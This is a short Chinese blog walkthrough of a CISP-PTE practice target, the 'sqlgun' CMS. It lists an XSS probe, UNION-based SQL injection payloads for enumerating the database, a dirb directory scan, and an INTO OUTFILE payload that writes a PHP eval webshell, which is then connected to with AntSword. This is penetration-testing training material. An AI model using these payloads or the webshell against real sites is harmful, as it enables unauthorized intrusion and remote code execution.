CISP-PTE CMS sqlgun靶场渗透测试

cc7752102024-09-14 9:06

1.打开靶场

2.在搜索框尝试xss

<script>alert(1)</script>

发现此处存在xss漏洞

3.在搜索框尝试sql注入

-1' union select 1,2,3# 发现页面有回显

4.查询数据库名

-1' union select 1,database(),3#

5.查询数据库的所有表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'),3#

6.扫描敏感目录

dirb http://124.221.58.83:8081

7.访问phpinfo

可以看见网站的绝对路径

8.通过sql注入写入一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/1.php' #

9.访问写入的php文件

10.使用蚁剑进行连接

相关推荐
hao_wujing1 小时前
网络安全测评质量管理与标准解读
安全·web安全
黑客Ash4 小时前
网络安全概述
安全·web安全
NoneCoder10 小时前
JavaScript系列(26)--安全编程实践详解
开发语言·javascript·安全
jinan88611 小时前
出差人员携带的电脑文件信息安全如何保障?
大数据·运维·服务器·网络·安全·电脑
DX_水位流量监测12 小时前
雷达流量监测系统:精准监控水流,确保水资源安全
大数据·开发语言·网络·人工智能·安全·信息可视化
网络安全Max12 小时前
网络精英赛模拟练习
网络·安全·web安全
CyberSecurity_zhang12 小时前
车联网安全 -- 数字证书到底证明了什么?
安全·数字证书·ca·ra
IT 古月方源12 小时前
网络安全的学习路径 (包括资源)快速学习
运维·网络·学习·tcp/ip·安全·web安全·网络安全
xinxin882212 小时前
如何给即将满的 C 盘添加磁盘空间
windows·安全·ios·电脑·笔记本电脑·ipad
热门推荐
01玄机平台应急响应—webshell查杀02Dell服务器升级ubuntu 22.04失败解决03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04[Docker]使用Docker部署常见的中间件05密码学原理技术-第六章-introduction to pulibc-key cryptography06优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间07年出货2亿台,只赚“辛苦钱”!又一家代工巨头押宝汽车电子08go下载依赖提示连接失败09渗透测试之SQLMAP工具详解 kali自带SQLmap解释 重点sqlmap --tamper 使用方式详解 搞完你就很nice了10ChatGPT + Stable Diffusion + 百度AI + MoviePy 实现文字生成视频,小说转视频,自媒体神器!(二)